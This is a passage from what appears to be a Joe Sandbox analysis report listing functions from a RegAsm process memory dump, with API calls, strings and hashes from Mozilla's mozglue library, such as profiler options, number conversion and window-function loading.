                                                                                    • Opcode Fuzzy Hash: 73d15f2ac2eadd4cf55b1d70dd7607aa3d1dfab18dca193b3b2d7635601650a1
                                                                                    • Instruction Fuzzy Hash: 6FE1ADB1A14F45CAC712DF359810267B7FABF9B385F10DB1EE8AF2A901DB30A4468305
                                                                                    Function 6C727030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32 ref: 6C727046
                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C727060
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C72707E
                                                                                      • Part of subcall function 6C6D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6D81DE
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C727096
                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C72709C
                                                                                    • LocalFree.KERNEL32(?), ref: 6C7270AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                    • String ID: ### ERROR: %s: %s$(null)
                                                                                    • API String ID: 2989430195-1695379354
                                                                                    • Opcode ID: 34ba64ea25a2ff5a336485615c2faa717091ebc73ae302cbdb58694bd903eb42
                                                                                    • Instruction ID: f5333a67f582d61ddd4578f66c3ed9852c9d8836712c7d0503b22cbf2c6e0c4a
                                                                                    • Opcode Fuzzy Hash: 34ba64ea25a2ff5a336485615c2faa717091ebc73ae302cbdb58694bd903eb42
                                                                                    • Instruction Fuzzy Hash: EE01B9B2A00118AFDB00ABA4DC4ADAF7BBCEF49219F014436FA05A3241D6717D188BE5
                                                                                    Function 6C712C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C712C31
                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C712C61
                                                                                      • Part of subcall function 6C6C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6C4E5A
                                                                                      • Part of subcall function 6C6C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6C4E97
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C712C82
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C712E2D
                                                                                      • Part of subcall function 6C6D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6D81DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                    • API String ID: 801438305-4149320968
                                                                                    • Opcode ID: 4889ebc0bba130c914ec364ffde80ad1b7b49e3e011fc863d850486b97cd708b
                                                                                    • Instruction ID: a0dc4d5ea6f0ee935708caa7c8ccdcafb7308b82e5d309ab695bd6992bd50a20
                                                                                    • Opcode Fuzzy Hash: 4889ebc0bba130c914ec364ffde80ad1b7b49e3e011fc863d850486b97cd708b
                                                                                    • Instruction Fuzzy Hash: 6891DFB060C7408FC724DF24C58969FB7E1EF8A358F14892DE59A8BB50EB30D949CB56
                                                                                    Function 6C729E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv__aullrem
                                                                                    • String ID: -Infinity$NaN
                                                                                    • API String ID: 3839614884-2141177498
                                                                                    • Opcode ID: 7060cc37c3bc595d8f6096bfe894b46d22110d7efbf6c33a3d0703c20956c8ca
                                                                                    • Instruction ID: 7f226c44947ed8ae70a240a7dd14a4de955e140d8f1eb9cbf0be398a27ea7992
                                                                                    • Opcode Fuzzy Hash: 7060cc37c3bc595d8f6096bfe894b46d22110d7efbf6c33a3d0703c20956c8ca
                                                                                    • Instruction Fuzzy Hash: 2DC1D031F003188BDB24CFA8C950BAEB7B6FF85324F18452DD505ABB81D778A949CB91
                                                                                    Function 6C73545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C738A4B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID: ~qll
                                                                                    • API String ID: 2221118986-1926955788
                                                                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                    • Instruction ID: 62010fc6c7730ef0bb71e20bd2f7f021b3d42157a4d645cff980f538e29eaa6c
                                                                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                    • Instruction Fuzzy Hash: 36B1E772A0022ACFDB14CF68CD90799B7B2EF95314F1812AAC55DDB786D730A985CB90
                                                                                    Function 6C73542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C7388F0
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C73925C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID: ~qll
                                                                                    • API String ID: 2221118986-1926955788
                                                                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                    • Instruction ID: a42d0c70b9a4106fd3ce48efb1e181d71559f34bb370c0a535afa5d71f240ced
                                                                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                    • Instruction Fuzzy Hash: ECB1D672E0112ACFCB14CE58CD806EDB7B2AF94314F14427AC959DB786D730A989CB90
                                                                                    Function 6C7350C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C738E18
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C73925C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID: ~qll
                                                                                    • API String ID: 2221118986-1926955788
                                                                                    • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                    • Instruction ID: da431209e88de1e6442c186e450d949066af983031a7e69f6c546323725beb69
                                                                                    • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                    • Instruction Fuzzy Hash: CFA1E872E00126CFCB14CF68CD80799B7B2AF95314F1542BAC95DEB786D730A999CB90
                                                                                    Function 6C72B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6D9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C72B92D), ref: 6C6D9BC8
                                                                                      • Part of subcall function 6C6D9B80: __Init_thread_footer.LIBCMT ref: 6C6D9BDB
                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6D03D4,?), ref: 6C72B955
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C72B9A5
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C72BA20
                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6C72BA7B
                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C72BA81
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C72BA86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                    • String ID:
                                                                                    • API String ID: 1753913139-0
                                                                                    • Opcode ID: ee5fcc1fb658e3d39adaa17c364da9af1646ff504c5b3f2cad87ea32fd166100
                                                                                    • Instruction ID: d7b46d00472c99d9d250e9e7523269780e2d32c29e9ebfa44b51c8aee3ed0cb0
                                                                                    • Opcode Fuzzy Hash: ee5fcc1fb658e3d39adaa17c364da9af1646ff504c5b3f2cad87ea32fd166100
                                                                                    • Instruction Fuzzy Hash: 8C515D71E01229DFDF14CEA8DA84ADDB7B6BF88314F154129E906B7704DB34BD458B90
                                                                                    Function 6C7177A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C717A81
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C717A93
                                                                                      • Part of subcall function 6C6E5C50: GetTickCount64.KERNEL32 ref: 6C6E5D40
                                                                                      • Part of subcall function 6C6E5C50: EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E5D67
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C717AA1
                                                                                      • Part of subcall function 6C6E5C50: __aulldiv.LIBCMT ref: 6C6E5DB4
                                                                                      • Part of subcall function 6C6E5C50: LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6E5DED
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C717B31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 4054851604-0
                                                                                    • Opcode ID: c8f8adfa2009089b3659310cf7c78dd83461ad5561eb176edfccac1c605340d8
                                                                                    • Instruction ID: 565159297a00b0765cd10390cb3fd828100b94c84ae043ffdd93872aa762d817
                                                                                    • Opcode Fuzzy Hash: c8f8adfa2009089b3659310cf7c78dd83461ad5561eb176edfccac1c605340d8
                                                                                    • Instruction Fuzzy Hash: A3B1A03560C3808BCB24CF25C55465FB7E2BFC9318F194A2DE99567B91DB70E90ACB82
                                                                                    Function 6C72B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C72B720
                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6C72B75A
                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C6FFE3F,00000000,00000000,?,?,00000000,?,6C6FFE3F), ref: 6C72B760
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                    • String ID:
                                                                                    • API String ID: 304294125-0
                                                                                    • Opcode ID: 3acd386b570d50b7ddc53c2b21d6ebd6b7ef75364b3340c2f014aca68533fdc9
                                                                                    • Instruction ID: 83feb896d19348bf41cbd41cfda0c98fca1b4a505d9b55e609ac322570b9a01e
                                                                                    • Opcode Fuzzy Hash: 3acd386b570d50b7ddc53c2b21d6ebd6b7ef75364b3340c2f014aca68533fdc9
                                                                                    • Instruction Fuzzy Hash: 8FF0C8B094021CAEDF019AB1CD88BDF77BD9B0431EF10623AD516616C0D778A5CCD660
                                                                                    Function 6C72B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6D03D4,?), ref: 6C72B955
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C72B9A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryQueryVirtualrand_s
                                                                                    • String ID:
                                                                                    • API String ID: 1889792194-0
                                                                                    • Opcode ID: 6f9bf1494146494d3db79d7b0b433442b084eb2c42f67fff1d5442b4f0db92c4
                                                                                    • Instruction ID: bb3bcf2f25cc7c477277028c2aeb0c62adb10d5e433b978dfde7db3e3c8bb4f3
                                                                                    • Opcode Fuzzy Hash: 6f9bf1494146494d3db79d7b0b433442b084eb2c42f67fff1d5442b4f0db92c4
                                                                                    • Instruction Fuzzy Hash: 8D41B471E01219DFDF04CFA9D980ADEB7B6FF88314F14813AE516A7704DB34A8458B94
                                                                                    Function 6C7255F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(user32,?,6C6FE1A5), ref: 6C725606
                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6C6FE1A5), ref: 6C72560F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C725633
                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C72563D
                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C72566C
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C72567D
                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C725696
                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7256B2
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7256CB
                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7256E4
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7256FD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C725716
                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C72572F
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C725748
                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C725761
                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C72577A
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C725793
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7257A8
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7257BD
                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7257D5
                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7257EA
                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7257FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                    • API String ID: 2238633743-1964193996
                                                                                    • Opcode ID: 6c8c7d929f13d2cd2f2824725a6700ea2f1bd59414833797e89808c9afaa0647
                                                                                    • Instruction ID: 8568325e1e59f67d17005a2f0db9d6fcb14505acf79d912cabd96f2bca085924
                                                                                    • Opcode Fuzzy Hash: 6c8c7d929f13d2cd2f2824725a6700ea2f1bd59414833797e89808c9afaa0647
                                                                                    • Instruction Fuzzy Hash: 0B5144706017125BDB40BF3A9F44D2A7ABCEB4B249B50D436E921E2A46EB74DD00CF60
                                                                                    Function 6C70CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C6D582D), ref: 6C70CC27
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C6D582D), ref: 6C70CC3D
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C73FE98,?,?,?,?,?,6C6D582D), ref: 6C70CC56
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C6D582D), ref: 6C70CC6C
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C6D582D), ref: 6C70CC82
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C6D582D), ref: 6C70CC98
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6D582D), ref: 6C70CCAE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C70CCC4
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C70CCDA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C70CCEC
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C70CCFE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C70CD14
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C70CD82
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C70CD98
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C70CDAE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C70CDC4
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C70CDDA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C70CDF0
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C70CE06
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C70CE1C
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C70CE32
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C70CE48
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C70CE5E
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C70CE74
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C70CE8A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: strcmp
                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                    • API String ID: 1004003707-2809817890
